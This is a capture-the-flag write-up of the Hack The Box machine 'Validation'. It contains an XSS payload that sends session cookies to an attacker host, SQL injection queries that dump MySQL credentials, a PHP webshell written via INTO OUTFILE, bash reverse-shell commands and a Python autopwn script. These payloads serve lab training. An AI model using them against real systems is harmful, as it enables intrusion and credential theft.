> For the complete documentation index, see [llms.txt](https://angellm.gitbook.io/hacknotes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://angellm.gitbook.io/hacknotes/htb/2022/validation.md).

# Validation

**Date**: 15/06/2022

**Difficulty**: Easy

**CTF**: <https://app.hackthebox.com/machines/Validation>

***

Let’s start testing the connection with the target machine:

<figure><img src="/files/8BrVllw9Boe0sRWz6tCP" alt=""><figcaption></figcaption></figure>

Now, let’s scan the TCP Ports of the target machine:

<figure><img src="/files/eHQgWnuqFh9pcYhjvs1Y" alt=""><figcaption></figcaption></figure>

There are 4 open ports: 22 (ssh), 80 (http), 4566 (kwtc), 8080 (http-proxy).

Let’s try to gather more info of the services running in these ports:

<figure><img src="/files/56nrImHUEgbPR7h4Pz7E" alt=""><figcaption></figcaption></figure>

The port 4566 doesn’t seem to be a kwtc service…

Let’s do a whatweb scan on the http services ports:

<figure><img src="/files/SvwNJWh1nBmLiw8ObICU" alt=""><figcaption></figcaption></figure>

Ok, let’s see how the website hosted on port 80 looks:

<figure><img src="/files/djKSIR9uAh42CdjAhUrF" alt=""><figcaption></figcaption></figure>

A simple form where you can input a username, select a country and add your entry clicking on Join Now button.

Let’s do a test using angellm as username and Spain as country.

<figure><img src="/files/6jor5O7ZJGgjoz6n2Z8c" alt=""><figcaption></figcaption></figure>

The website displays it now. Interesting. Let’s try some payloads…

<figure><img src="/files/gQB1L929PpuRhLVmru8r" alt=""><figcaption></figcaption></figure>

Ok, it seems to be vulnerable to XSS.

<figure><img src="/files/Vxq0W8CwbipnkzuoC6jI" alt=""><figcaption></figcaption></figure>

The website is setting a cookie… Maybe we can use the XSS to try to grab the session cookie?

Th`<script>fetch('http://10.10.14.234?cookie=' + btoa(document.cookie) );</script>`

Let’s open a http server in our machine and send the payload:

<figure><img src="/files/LzJLqOAkCThVznxRYFmY" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/QAq6SPIy0xyrIorhWay0" alt=""><figcaption></figcaption></figure>

I have set the value of the cookie with the one obtained by the script but nothing happened after reloading the page. Let’s enumerate the directories:

<figure><img src="/files/svn7jLVLZD6E5YG7wzrI" alt=""><figcaption></figcaption></figure>

It discovered css and js directories, also discovered a server-status directory we have no permissions to access to.

Let’s enumerate .txt and .php files:

<figure><img src="/files/rpRJsRubmbwbS5QI429u" alt=""><figcaption></figcaption></figure>

The only php file we have not visited yet is the config.php and is empty… Let’s go back to the form.

I will intercept a request and this time I’ll modify the country:

`username=ll&country='`

<figure><img src="/files/my7YcQxALxkHKSWGB12H" alt=""><figcaption></figcaption></figure>

Mmm… fatal error. Sounds good to me. Maybe we have an error based SQL injection? Let’s see…

`username=ll&country=' UNION SELECT 1 -- -`

<figure><img src="/files/hYftD2ZSVtg8tuz6exH3" alt=""><figcaption></figcaption></figure>

`username=ll&country=' UNION SELECT 1,2 -- -`

<figure><img src="/files/3QWV24FivoRvZGpp0VLU" alt=""><figcaption></figcaption></figure>

`' UNION SELECT database()--`

<figure><img src="/files/RsLdmvkeBYu9EGM7UIaT" alt=""><figcaption></figcaption></figure>

The database name is `registration`. Let’s see the tables of that database:

`' UNION SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'registration' -- -`

<figure><img src="/files/SlGHMy1ndGfpNMlSOFNz" alt=""><figcaption></figcaption></figure>

There is only one table called also `registration` let’s find the columns name of the table:

`' UNION SELECT group_concat(column_name) FROM information_schema.columns WHERE table_name = 'registration' -- -`

<figure><img src="/files/xyqN4mCjAvi7wttLtNT1" alt=""><figcaption></figcaption></figure>

Very interesting! There are 4 columns: `username`, `userhash`, `country` and `regtime`. Let’s try to extract all the usernames and userhash:

<figure><img src="/files/xqHATzhUZVXBewCfojBp" alt=""><figcaption></figcaption></figure>

Mmm… not very interesting, `fff` and `ll` are the usernames I used to test the SQLi, and there is no other username there…

Let’s list all databases:

`' UNION SELECT concat(schema_name) FROM information_schema.schemata -- -`

<figure><img src="/files/h75BV8kv7akUYtGQtDez" alt=""><figcaption></figcaption></figure>

`' UNION SELECT concat(TABLE_NAME) FROM information_schema.TABLES WHERE table_schema='mysql' -- -`

<figure><img src="/files/8YFonw4gA38DxNmCCnK9" alt=""><figcaption></figcaption></figure>

`' UNION SELECT concat(column_name) FROM information_schema.COLUMNS WHERE table_name='user' -- -`

<figure><img src="/files/icySskyEJQLHPhxGqxos" alt=""><figcaption></figcaption></figure>

`' UNION SELECT group_concat(User,':',Password SEPARATOR '<br>') FROM mysql.user -- -`

<figure><img src="/files/0HJhgwxqAkxJp68hCo21" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/NxpYGBz1SViJgu3yfGeH" alt=""><figcaption></figcaption></figure>

I tried to log in via ssh using that password with no success. Let’s se if we can inject content using the SQLi:

`' UNION SELECT "Prueba de contenido" into outfile '/var/www/html/prueba.txt' -- -`

<figure><img src="/files/QYVrc8UScKz1a6FWpHak" alt=""><figcaption></figcaption></figure>

Yeah, we can.

Let’s try to upload a php webshell!

`' UNION SELECT "<?php system($_REQUEST['cmd']); ?>" into outfile '/var/www/html/ws.php' -- -`

<figure><img src="/files/SbLiaM4a26L4XFk7ShBv" alt=""><figcaption></figcaption></figure>

Now we can send commands as www-data. Let’s try to obtain a reverse shell to operate more easily:

`http://10.129.85.205/ws.php?cmd=bash -i >& /dev/tcp/10.10.14.234/443 0>&1`

<figure><img src="/files/0nx2stJ9v1yk7Qm3bMhk" alt=""><figcaption></figcaption></figure>

We didn’t get a reverse shell. Maybe because it is not URL-Encoded? Let’s try it:

`http://10.129.85.205/ws.php?cmd=bash -i >%26 %2Fdev%2Ftcp%2F10.10.14.234%2F443 0>%261`

Same results. In cases like this one, sometimes it’s necessary to execute the command like this:

`http://10.129.85.205/ws.php?cmd=bash -c "bash -i >& /dev/tcp/10.10.14.234/443 0>&1"`

But URL-Encoded:

<figure><img src="/files/BrqLWdIChkYnM8UJUi9C" alt=""><figcaption></figcaption></figure>

Another way to gain access would be to script an autopwn in python like this one and executing it:

```bash
#!/usr/bin/python3

from pwn import *
import signal, pdb, requests

def def_handler(sig, frame):
    print("\n\n[!] Saliendo...\n")
    sys.exit(1)

# Ctrl + C
signal.signal(signal.SIGINT, def_handler)

if len(sys.argv) !=3:
    log.failure("Uso: %s <ip-address> filename" %sys.argv[0])
    sys.exit(1)

# Variables globales
ip_address = sys.argv[1]
filename = sys.argv[2]
main_url="http://%s/" % ip_address
lport = 443

def createFile():

    data_post = {
        'username' : 'whatever',
        'country' : """'UNION SELECT "<?php system($_REQUEST['cmd']); ?>" into outfile '/var/www/html/%s' -- -""" %(filename)
    }

    r = requests.post(main_url, data=data_post)

def getAccess():
    data_post = {
        'cmd' : "bash -c 'bash -i >& /dev/tcp/10.10.14.234/443 0>&1'"
    }

    r = requests.post(main_url + "%s" % filename, data_post);

if __name__=='__main__':

    createFile()

    try:
        threading.Thread(target=getAccess, args=()).start()
    except Exception as e:
        log.error(str(e))

    shell = listen(lport, timeout=20).wait_for_connection()
    shell.interactive()
```

<figure><img src="/files/32OGtGjggYRzHQ1mc0GQ" alt=""><figcaption></figcaption></figure>

Ok, so we are logged as www-data, let’s see what can be found:

<figure><img src="/files/taWf0xpDmx4V94BJJjYk" alt=""><figcaption></figcaption></figure>

Config files sometimes have credentials inside, let’s cat it:

<figure><img src="/files/Z1U00Fj9Cf0538ZCsgoY" alt=""><figcaption></figcaption></figure>

Yeah! There are some credentials here.

<figure><img src="/files/zeTyHHPn755u4BV4DRPF" alt=""><figcaption></figcaption></figure>

Investigating a little more we got the user flag.

Now we have to escalate privileges:

<figure><img src="/files/zNfk8ay1uIGtwtVmB78l" alt=""><figcaption></figcaption></figure>

There is no user named as uhc. Maybe is root reusing the password?

<figure><img src="/files/hnUxFoYkRH1u52up5kDs" alt=""><figcaption></figcaption></figure>

Yeah, it is. And that’s how we obtain the root flag!


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://angellm.gitbook.io/hacknotes/htb/2022/validation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.